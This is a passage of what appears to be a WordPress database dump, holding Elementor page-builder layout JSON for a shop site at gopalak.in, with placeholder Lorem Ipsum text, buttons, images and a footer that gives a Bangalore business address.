Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8625,1504,'_elementor_page_assets','a:0:{}'),(8627,1505,'_elementor_edit_mode','builder'),(8628,1505,'_elementor_template_type','wp-page'),(8629,1505,'_elementor_version','3.7.7'),(8630,1505,'_wp_page_template','elementor_canvas'),(8631,1505,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 